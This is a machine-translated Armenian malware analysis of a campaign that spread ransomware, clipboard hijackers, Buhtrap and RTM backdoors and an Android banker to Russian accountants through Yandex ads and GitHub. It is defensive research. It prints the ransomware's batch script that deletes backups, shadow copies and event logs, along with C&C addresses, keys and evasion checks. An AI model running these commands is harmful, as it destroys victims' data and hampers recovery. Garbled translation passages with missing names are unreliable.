Հաշվապահներին կիբերհարձակման թիրախ դարձնելու համար կարող եք օգտագործել աշխատանքային փաստաթղթերը, որոնք նրանք փնտրում են առցանց: Սա մոտավորապես այն է, ինչ անում է կիբեր խումբը վերջին մի քանի ամիսների ընթացքում՝ տարածելով հայտնի ետնադռներ: и , ինչպես նաև ծածկագրիչներ և կրիպտոարժույթներ գողանալու ծրագրեր։ Թիրախների մեծ մասը գտնվում է Ռուսաստանում։ Հարձակումն իրականացվել է Yandex.Direct-ում վնասակար գովազդ տեղադրելով։ Հնարավոր զոհերին ուղղորդել են մի կայք, որտեղ նրանց խնդրել են ներբեռնել վնասակար ֆայլ՝ քողարկված որպես փաստաթղթի ձևանմուշ: Yandex-ը հեռացրել է վնասակար գովազդը մեր զգուշացումից հետո:
Buhtrap-ի սկզբնական կոդը նախկինում հայտնվել է համացանցում, որպեսզի յուրաքանչյուրը կարողանա օգտագործել այն: Մենք տեղեկություն չունենք RTM կոդի առկայության վերաբերյալ:
Այս գրառման մեջ մենք ձեզ կպատմենք, թե ինչպես են հարձակվողները տարածել չարամիտ ծրագրեր Yandex.Direct-ի միջոցով և տեղակայել այն GitHub-ում: Գրառումը կավարտվի չարամիտ ծրագրի տեխնիկական վերլուծությամբ:
Buhtrap-ը և RTM-ը վերադառնում են բիզնեսի
Տարածման և տուժածների մեխանիզմ
Տուժողներին առաքվող տարբեր բեռնատարներն ունեն տարածման ընդհանուր մեխանիզմ: Հարձակվողների կողմից ստեղծված բոլոր վնասակար ֆայլերը տեղադրվել են երկու տարբեր GitHub պահեստներում:
Սովորաբար, պահոցը պարունակում էր մեկ ներբեռնվող վնասակար ֆայլ, որը հաճախ փոխվում էր: Քանի որ GitHub-ը թույլ է տալիս դիտել պահեստի փոփոխությունների պատմությունը, մենք կարող ենք տեսնել, թե ինչ չարամիտ ծրագրեր են տարածվել որոշակի ժամանակահատվածում: Տուժողին համոզելու համար ներբեռնել վնասակար ֆայլը, օգտագործվել է վերևի նկարում ցուցադրված blanki-shabloni24[.]ru կայքը:
Կայքի ձևավորումը և վնասակար ֆայլերի բոլոր անվանումները հետևում են մեկ հայեցակարգի. ձևեր, ձևանմուշներ, պայմանագրեր, նմուշներ և այլն: Հաշվի առնելով, որ Buhtrap և RTM ծրագրերը նախկինում արդեն օգտագործվել են հաշվապահների վրա հարձակումների ժամանակ, մենք ենթադրեցինք, որ Նոր քարոզարշավի ռազմավարությունը նույնն է. Միակ հարցն այն է, թե ինչպես է զոհը հայտնվել հարձակվողների կայք։
Վարակ
Առնվազն մի քանի պոտենցիալ զոհեր, ովքեր հայտնվել են այս կայքում, գրավել են վնասակար գովազդը: Ստորև բերված է URL-ի օրինակ.
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Ինչպես տեսնում եք հղումից, դրոշակը տեղադրվել է օրինական հաշվապահական ֆորումում bb.f2[.]kz: Կարևոր է նշել, որ պաստառները հայտնվել են տարբեր կայքերում, բոլորն ունեին քարոզարշավի նույն ID-ն (blanki_rsya), և մեծ մասը վերաբերում էին հաշվապահական հաշվառման կամ իրավաբանական օգնության ծառայություններին: URL-ը ցույց է տալիս, որ պոտենցիալ զոհն օգտագործել է «ներբեռնման հաշիվ-ապրանքագրի ձևը» հարցումը, որն աջակցում է նպատակային հարձակումների մեր վարկածին: Ստորև ներկայացված են այն կայքերը, որտեղ հայտնվել են պաստառները և համապատասխան որոնման հարցումները:
- ներբեռնել հաշիվ-ապրանքագրի ձևը – bb.f2[.]kz
- նմուշի պայմանագիր - Ipopen[.]ru
- դիմումի բողոքի նմուշ - 77metrov[.]ru
- համաձայնագրի ձև - blank-dogovor-kupli-prodazhi[.]ru
- օրինակելի դատական միջնորդություն - zen.yandex[.]ru
- օրինակելի բողոք - yurday[.]ru
- պայմանագրային ձևերի նմուշ – Regforum[.]ru
- պայմանագրի ձև – assistentus[.]ru
- բնակարանի պայմանագրի նմուշ – napravah[.]com
- օրինական պայմանագրերի նմուշներ - avito[.]ru
Հնարավոր է, որ blanki-shabloni24[.]ru կայքը կազմաձևված է պարզ տեսողական գնահատում անցնելու համար: Սովորաբար, գովազդը, որը մատնանշում է պրոֆեսիոնալ տեսք ունեցող կայք՝ GitHub-ի հղումով, ակնհայտորեն վատ բան չի թվում: Բացի այդ, հարձակվողները վնասակար ֆայլեր են բեռնել պահեստ միայն սահմանափակ ժամկետով, հավանաբար քարոզարշավի ընթացքում: Ժամանակի մեծ մասը GitHub-ի պահոցը պարունակում էր դատարկ zip արխիվ կամ դատարկ EXE ֆայլ: Այսպիսով, հարձակվողները կարող էին գովազդ տարածել Yandex.Direct-ի միջոցով այն կայքերում, որոնք, ամենայն հավանականությամբ, այցելել են հաշվապահները, որոնք եկել են ի պատասխան հատուկ որոնման հարցումների:
Հաջորդը, եկեք նայենք այս կերպ բաշխված տարբեր բեռնատարներին:
Օգտակար բեռի վերլուծություն
Բաշխման ժամանակագրություն
Վնասակար արշավը սկսվել է 2018 թվականի հոկտեմբերի վերջին և ակտիվ է գրելու պահին։ Քանի որ ամբողջ պահեստը հանրությանը հասանելի էր GitHub-ում, մենք կազմեցինք վեց տարբեր չարամիտ ընտանիքների բաշխման ճշգրիտ ժամանակացույց (տես ստորև նկարը): Մենք ավելացրել ենք տող, որը ցույց է տալիս, թե երբ է հայտնաբերվել դրոշի հղումը, որը չափվում է ESET հեռաչափությամբ, git պատմության հետ համեմատելու համար: Ինչպես տեսնում եք, սա լավ է փոխկապակցված GitHub-ում օգտակար բեռի առկայության հետ: Փետրվարի վերջին անհամապատասխանությունը կարելի է բացատրել նրանով, որ մենք չունեինք փոփոխությունների պատմության մի մասը, քանի որ պահոցը հանվել էր GitHub-ից, նախքան այն ամբողջությամբ ստանալը:
Նկար 1. Չարամիտ ծրագրերի բաշխման ժամանակագրություն:
Կոդի ստորագրման վկայագրեր
Արշավն օգտագործել է բազմաթիվ վկայագրեր: Ոմանք ստորագրվել են մեկից ավելի չարամիտ ընտանիքի կողմից, ինչը հետագայում ցույց է տալիս, որ տարբեր նմուշներ պատկանում են նույն քարոզարշավին: Չնայած մասնավոր բանալիի առկայությանը, օպերատորները համակարգված կերպով չէին ստորագրում երկուականները և չէին օգտագործում բանալին բոլոր նմուշների համար: 2019 թվականի փետրվարի վերջին հարձակվողները սկսեցին ստեղծել անվավեր ստորագրություններ՝ օգտագործելով Google-ին պատկանող վկայականը, որի անձնական բանալին չունեին:
Արշավին ներգրավված բոլոր վկայագրերը և չարամիտ ծրագրերի ընտանիքները, որոնք նրանք ստորագրում են, թվարկված են ստորև բերված աղյուսակում:
Մենք նաև օգտագործել ենք այս կոդերի ստորագրման վկայագրերը՝ այլ վնասակար ծրագրերի ընտանիքների հետ կապեր հաստատելու համար: Վկայականների մեծ մասի համար մենք չգտանք նմուշներ, որոնք չեն բաշխվել GitHub պահեստի միջոցով: Այնուամենայնիվ, TOV «MARIYA» վկայականն օգտագործվել է բոտնետին պատկանող չարամիտ ծրագրեր ստորագրելու համար , գովազդային ծրագրեր և հանքագործներ: Քիչ հավանական է, որ այս չարամիտ ծրագիրը կապված է այս քարոզարշավի հետ: Ամենայն հավանականությամբ, վկայականը ձեռք է բերվել darknet-ից։
Win32/Filecoder.Buhtrap
Առաջին բաղադրիչը, որը գրավեց մեր ուշադրությունը, նոր հայտնաբերված Win32/Filecoder.Buhtrap-ն էր: Սա Delphi երկուական ֆայլ է, որը երբեմն փաթեթավորված է: Այն հիմնականում տարածվել է 2019 թվականի փետրվար-մարտ ամիսներին։ Այն վարվում է այնպես, ինչպես վայել է փրկագին ծրագրին. որոնում է տեղական կրիչներ և ցանցային թղթապանակներ և գաղտնագրում է գտնված ֆայլերը: Այն վտանգի ենթարկվելու համար ինտերնետ կապի կարիք չունի, քանի որ այն չի կապվում սերվերի հետ՝ գաղտնագրման բանալիներ ուղարկելու համար: Փոխարենը, այն ավելացնում է «token» փրկագնի հաղորդագրության վերջում և առաջարկում է օգտագործել էլ.փոստ կամ Bitmessage օպերատորների հետ կապ հաստատելու համար:
Հնարավորինս շատ զգայուն ռեսուրսներ գաղտնագրելու համար Filecoder.Buhtrap-ը գործարկում է մի թեմա, որը նախատեսված է փակելու հիմնական ծրագրակազմը, որը կարող է ունենալ բաց ֆայլերի մշակիչներ, որոնք պարունակում են արժեքավոր տեղեկություններ, որոնք կարող են խանգարել կոդավորմանը: Թիրախային գործընթացները հիմնականում տվյալների բազայի կառավարման համակարգերն են (DBMS): Բացի այդ, Filecoder.Buhtrap-ը ջնջում է տեղեկամատյանների ֆայլերը և կրկնօրինակները՝ տվյալների վերականգնումը դժվարացնելու համար: Դա անելու համար գործարկեք ստորև բերված խմբաքանակի սցենարը:
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap-ը օգտագործում է օրինական առցանց IP Logger ծառայություն, որը նախատեսված է կայքի այցելուների մասին տեղեկություններ հավաքելու համար: Սա նախատեսված է փրկագնի զոհերին հետևելու համար, ինչը հրամանի տողի պարտականությունն է.
mshta.exe "javascript:document.write('');"
Գաղտնագրման համար նախատեսված ֆայլերը ընտրվում են, եթե դրանք չեն համապատասխանում երեք բացառման ցուցակներին: Նախ, հետևյալ ընդլայնումներով ֆայլերը գաղտնագրված չեն. com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys և .չղջիկ. Երկրորդ, բոլոր ֆայլերը, որոնց ամբողջական ուղին պարունակում է ստորև բերված ցանկից գրացուցակի տողեր, բացառված են:
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Երրորդ, որոշ ֆայլերի անուններ նույնպես բացառված են գաղտնագրումից, այդ թվում՝ փրկագնի հաղորդագրության ֆայլի անվանումը։ Ցանկը ներկայացնում ենք ստորև. Ակնհայտ է, որ այս բոլոր բացառությունները նախատեսված են մեքենան աշխատեցնելու համար, բայց նվազագույն պիտանիությամբ:
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Ֆայլերի կոդավորման սխեմա
Կատարվելուց հետո չարամիտ ծրագիրը առաջացնում է 512-բիթանոց RSA բանալիների զույգ: Մասնավոր ցուցիչը (d) և մոդուլը (n) այնուհետև կոդավորված են կոշտ կոդավորված 2048-բիթանոց հանրային բանալիով (հանրային ցուցիչ և մոդուլ), zlib փաթեթավորված և base64 կոդավորված: Դրա համար պատասխանատու կոդը ներկայացված է Նկար 2-ում:
Նկար 2. 512-բիթանոց RSA բանալիների զույգ ստեղծման գործընթացի Hex-Rays ապակոմպիլյացիայի արդյունքը:
Ստորև բերված է գեներացված մասնավոր բանալիով պարզ տեքստի օրինակ, որը փրկագնի հաղորդագրությանը կցված նշան է:
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Հարձակվողների հանրային բանալին տրված է ստորև:
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Ֆայլերը կոդավորված են AES-128-CBC-ի միջոցով 256-բիթանոց բանալիով: Յուրաքանչյուր գաղտնագրված ֆայլի համար ստեղծվում է նոր բանալի և սկզբնականացման նոր վեկտոր: Հիմնական տեղեկատվությունը ավելացվում է կոդավորված ֆայլի վերջում: Դիտարկենք գաղտնագրված ֆայլի ձևաչափը:
Կոդավորված ֆայլերը ունեն հետևյալ վերնագիրը.
Աղբյուրի ֆայլի տվյալները VEGA կախարդական արժեքի ավելացմամբ կոդավորված են առաջին 0x5000 բայթում: Վերծանման ամբողջ տեղեկատվությունը կցվում է հետևյալ կառուցվածքով ֆայլին.
- Ֆայլի չափի նշիչը պարունակում է նշան, որը ցույց է տալիս, թե արդյոք ֆայլը մեծ է 0x5000 բայթից
— AES բանալի բլոկ = ZlibCompress (RSAEncrypt (AES բանալի + IV, ստեղծված RSA բանալիների զույգի հանրային բանալին))
- RSA բանալի բլբ = ZlibCompress (RSAEncrypt (ստեղծված RSA մասնավոր բանալի, կոշտ կոդավորված RSA հանրային բանալի))
Win32/ClipBanker
Win32/ClipBanker-ը բաղադրիչ է, որը բաշխվել է ընդհատումներով հոկտեմբերի վերջից մինչև 2018 թվականի դեկտեմբերի սկիզբ: Նրա դերն է վերահսկել clipboard-ի բովանդակությունը, այն փնտրում է կրիպտոարժույթի դրամապանակների հասցեներ: Որոշելով նպատակային դրամապանակի հասցեն՝ ClipBanker-ը այն փոխարինում է հասցեով, որը, ենթադրաբար, պատկանում է օպերատորներին: Նմուշները, որոնք մենք ուսումնասիրեցինք, ոչ տուփով էին, ոչ էլ մշուշոտ: Միակ մեխանիզմը, որն օգտագործվում է վարքագիծը քողարկելու համար, տողերի կոդավորումն է: Օպերատորի դրամապանակի հասցեները կոդավորված են RC4-ի միջոցով: Թիրախային կրիպտոարժույթներն են՝ Bitcoin, Bitcoin cash, Dogecoin, Ethereum և Ripple:
Այն ժամանակահատվածում, երբ չարամիտ ծրագիրը տարածվում էր հարձակվողների Bitcoin դրամապանակների վրա, մի փոքր գումար ուղարկվեց VTS-ին, ինչը կասկածի տակ է դնում արշավի հաջողությունը: Բացի այդ, ապացույցներ չկան, որոնք ենթադրում են, որ այդ գործարքներն ընդհանրապես կապված են եղել ClipBanker-ի հետ:
Win32/RTM
Win32/RTM բաղադրիչը մի քանի օրով բաշխվել է 2019 թվականի մարտի սկզբին: RTM-ը տրոյական բանկիր է, որը գրված է Դելֆիում, որն ուղղված է հեռավոր բանկային համակարգերին: 2017 թվականին ESET հետազոտողները հրապարակել են այս ծրագրի նկարագրությունը դեռ տեղին է: 2019 թվականի հունվարին թողարկվեց նաև Palo Alto Networks-ը .
Buhtrap Loader
Որոշ ժամանակ GitHub-ում հասանելի էր ներբեռնիչ, որը նման չէր նախորդ Buhtrap գործիքներին: Նա դիմում է https://94.100.18[.]67/RSS.php?<some_id> հաջորդ փուլը ստանալու համար և այն ուղղակիորեն բեռնում է հիշողության մեջ: Մենք կարող ենք տարբերակել երկրորդ փուլի կոդի երկու վարքագիծ. Առաջին URL-ում RSS.php-ն ուղղակիորեն փոխանցել է Buhtrap հետնադուռը. այս ետնադուռը շատ նման է սկզբնաղբյուրի արտահոսքից հետո հասանելիին:
Հետաքրքիր է, որ մենք տեսնում ենք մի քանի արշավներ Buhtrap backdoor-ով, և դրանք իբր վարում են տարբեր օպերատորներ: Այս դեպքում հիմնական տարբերությունն այն է, որ հետևի դուռն ուղղակիորեն բեռնված է հիշողության մեջ և չի օգտագործում սովորական սխեման DLL տեղակայման գործընթացի հետ, որի մասին մենք խոսեցինք: . Բացի այդ, օպերատորները փոխել են RC4 բանալին, որն օգտագործվում էր ցանցային երթևեկությունը գաղտնագրելու համար դեպի C&C սերվեր: Մեր տեսած արշավների մեծ մասում օպերատորները չեն անհանգստացել փոխել այս բանալին:
Երկրորդ, ավելի բարդ պահվածքն այն էր, որ RSS.php URL-ը փոխանցվեց մեկ այլ բեռնիչի: Այն իրականացրեց որոշակի խաբեություն, ինչպիսին է դինամիկ ներմուծման աղյուսակի վերակառուցումը: Bootloader-ի նպատակն է կապ հաստատել C&C սերվերի հետ [.]com/api/F27F84EDA4D13B15/2, ուղարկեք տեղեկամատյանները և սպասեք պատասխանի: Այն մշակում է պատասխանը որպես բշտիկ, այն բեռնում է հիշողության մեջ և կատարում այն: Օգտակար բեռը, որը մենք տեսանք այս բեռնիչի գործարկման ժամանակ, նույն Buhtrap backdoor-ն էր, բայց կարող են լինել այլ բաղադրիչներ:
Android/Spy.Banker
Հետաքրքիր է, որ Android-ի համար նախատեսված բաղադրիչ է հայտնաբերվել նաև GitHub-ի պահոցում: Նա գլխավոր մասնաճյուղում է եղել ընդամենը մեկ օր՝ 1թ. Բացի GitHub-ում տեղադրվելուց, ESET հեռաչափությունը որևէ ապացույց չի գտնում այս չարամիտ ծրագրի տարածման մասին:
Բաղադրիչը տեղակայվել է որպես Android հավելվածի փաթեթ (APK): Այն խիստ մշուշված է: Վնասակար պահվածքը թաքնված է գաղտնագրված JAR-ում, որը գտնվում է APK-ում: Այն կոդավորված է RC4-ով, օգտագործելով այս բանալիը.
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Նույն բանալին և ալգորիթմը օգտագործվում են տողերի գաղտնագրման համար: JAR գտնվում է APK_ROOT + image/files. Ֆայլի առաջին 4 բայթը պարունակում է կոդավորված JAR-ի երկարությունը, որը սկսվում է երկարության դաշտից անմիջապես հետո։
Ֆայլը վերծանելուց հետո մենք հայտնաբերեցինք, որ դա Anubis-ն էր, նախկինում բանկիր Android-ի համար. Չարամիտ ծրագիրն ունի հետևյալ հատկանիշները.
- միկրոֆոնի ձայնագրում
- սքրինշոթներ վերցնելը
- GPS կոորդինատների ստացում
- keylogger
- սարքի տվյալների կոդավորումը և փրկագնի պահանջը
- ուղարկելով սպամ
Հետաքրքիր է, որ բանկիրն օգտագործել է Twitter-ը որպես կապի պահուստային ալիք՝ մեկ այլ C&C սերվեր ստանալու համար: Մեր վերլուծած նմուշն օգտագործում էր @JonesTrader հաշիվը, սակայն վերլուծության պահին այն արդեն արգելափակված էր։
Բանկիրը պարունակում է Android սարքի թիրախային հավելվածների ցանկը: Այն ավելի երկար է, քան Sophos-ի ուսումնասիրության արդյունքում ստացված ցանկը։ Ցանկում ներառված են բազմաթիվ բանկային հավելվածներ, առցանց գնումների ծրագրեր, ինչպիսիք են Amazon-ը և eBay-ը, ինչպես նաև կրիպտոարժույթի ծառայություններ:
MSIL/ClipBanker.IH
Այս արշավի շրջանակներում բաշխված վերջին բաղադրիչը .NET Windows գործարկիչն էր, որը հայտնվեց 2019 թվականի մարտին: Ուսումնասիրված տարբերակների մեծ մասը փաթեթավորված էր ConfuserEx v1.0.0-ով: Ինչպես ClipBanker-ը, այս բաղադրիչն օգտագործում է clipboard-ը: Նրա նպատակը կրիպտոարժույթների լայն տեսականի է, ինչպես նաև առաջարկներ Steam-ում։ Բացի այդ, նա օգտագործում է IP Logger ծառայությունը՝ գողանալու Bitcoin անձնական WIF բանալին:
Պաշտպանության մեխանիզմներ
Ի հավելումն առավելությունների, որոնք ConfuserEx-ն ապահովում է վրիպազերծումը, թափոնը և կեղծումը կանխելու համար, բաղադրիչը ներառում է հակավիրուսային արտադրանքները և վիրտուալ մեքենաները հայտնաբերելու հնարավորությունը:
Ստուգելու համար, որ այն աշխատում է վիրտուալ մեքենայում, չարամիտ ծրագիրը օգտագործում է ներկառուցված Windows WMI հրամանի տողը (WMIC)՝ պահանջելու BIOS-ի տեղեկատվություն, մասնավորապես՝
wmic bios
Այնուհետև ծրագիրը վերլուծում է հրամանի ելքը և փնտրում հիմնաբառեր՝ VBOX, VirtualBox, XEN, qemu, bochs, VM:
Հակավիրուսային արտադրանքները հայտնաբերելու համար չարամիտ ծրագիրը Windows-ի կառավարման գործիքակազմի (WMI) հարցում է ուղարկում Windows անվտանգության կենտրոն՝ օգտագործելով ManagementObjectSearcher API, ինչպես ցույց է տրված ստորև: Base64-ից ապակոդավորումից հետո զանգն այսպիսի տեսք ունի.
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Նկար 3. Հակավիրուսային արտադրանքի նույնականացման գործընթացը:
Բացի այդ, չարամիտ ծրագիրը ստուգում է, թե արդյոք , գործիք, որը պաշտպանում է clipboard-ի հարձակումներից և, եթե այն աշխատում է, կասեցնում է այդ գործընթացի բոլոր շղթաները՝ դրանով իսկ անջատելով պաշտպանությունը:
Համառություն
Չարամիտ ծրագրի տարբերակը, որը մենք ուսումնասիրել ենք, կրկնօրինակվում է %APPDATA%googleupdater.exe և սահմանում է «թաքնված» հատկանիշը google գրացուցակի համար: Այնուհետև նա փոխում է արժեքը SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows ռեեստրում և ավելացնում է ուղին updater.exe. Այս կերպ չարամիտ ծրագիրը կգործարկվի ամեն անգամ, երբ օգտատերը մուտք է գործում:
Չարամիտ վարքագիծ
Ինչպես ClipBanker-ը, չարամիտ ծրագիրը վերահսկում է clipboard-ի բովանդակությունը և փնտրում կրիպտոարժույթի դրամապանակի հասցեներ, և երբ գտնում է, այն փոխարինում է օպերատորի հասցեներից մեկով: Ստորև բերված է թիրախային հասցեների ցանկը, որը հիմնված է կոդում հայտնաբերվածի վրա:
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Հասցեի յուրաքանչյուր տեսակի համար կա համապատասխան կանոնավոր արտահայտություն: STEAM_URL արժեքը օգտագործվում է Steam համակարգի վրա հարձակվելու համար, ինչպես երևում է սովորական արտահայտությունից, որն օգտագործվում է բուֆերում սահմանելու համար.
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Էքզֆիլտրացիոն ալիք
Ի հավելումն բուֆերի հասցեների փոխարինմանը, չարամիտ ծրագիրը թիրախավորում է Bitcoin, Bitcoin Core և Electrum Bitcoin դրամապանակների անձնական WIF բանալիները: Ծրագիրը օգտագործում է plogger.org-ը որպես արտազատման ալիք՝ WIF մասնավոր բանալի ստանալու համար: Դա անելու համար օպերատորներն ավելացնում են անձնական բանալու տվյալները User-Agent HTTP վերնագրում, ինչպես ցույց է տրված ստորև:
Նկար 4. IP Logger վահանակ՝ ելքային տվյալներով:
Օպերատորները չեն օգտագործել iplogger.org-ը՝ դրամապանակները արտազատելու համար: Նրանք, հավանաբար, այլ մեթոդի են դիմել դաշտում 255 նիշերի սահմանափակման պատճառով User-Agentցուցադրվում է IP Logger վեբ ինտերֆեյսում: Մեր ուսումնասիրած նմուշներում մյուս ելքային սերվերը պահվում էր շրջակա միջավայրի փոփոխականում DiscordWebHook. Զարմանալի է, որ այս միջավայրի փոփոխականը կոդում ոչ մի տեղ հատկացված չէ: Սա ենթադրում է, որ չարամիտ ծրագիրը դեռ մշակման փուլում է, և փոփոխականը նշանակված է օպերատորի փորձարկման մեքենային:
Մեկ այլ նշան կա, որ ծրագիրը մշակման փուլում է. Երկուական ֆայլը ներառում է երկու iplogger.org URL, և երկուսն էլ հարցվում են, երբ տվյալները արտահանվում են: Այս URL-ներից մեկին ուղղված հարցումում Referer դաշտում արժեքին նախորդում է «DEV /»: Մենք նաև գտանք մի տարբերակ, որը փաթեթավորված չէր ConfuserEx-ի միջոցով, այս URL-ի ստացողը կոչվում է DevFeedbackUrl: Հիմնվելով շրջակա միջավայրի փոփոխականի անվան վրա՝ մենք կարծում ենք, որ օպերատորները ծրագրում են օգտագործել Discord օրինական ծառայությունը և դրա վեբ գաղտնալսման համակարգը՝ կրիպտոարժույթի դրամապանակներ գողանալու համար:
Ամփոփում
Այս արշավը օրինական գովազդային ծառայությունների օգտագործման օրինակ է կիբերհարձակումների ժամանակ: Այս սխեման ուղղված է ռուսական կազմակերպություններին, սակայն մենք չենք զարմանա, եթե նման հարձակում տեսնենք ոչ ռուսական ծառայությունների միջոցով: Փոխզիջումներից խուսափելու համար օգտատերերը պետք է վստահ լինեն իրենց ներբեռնած ծրագրաշարի աղբյուրի հեղինակությանը:
Փոխզիջման և MITER ATT&CK հատկանիշների ցուցիչների ամբողջական ցանկը հասանելի է այստեղ .
Source: www.habr.com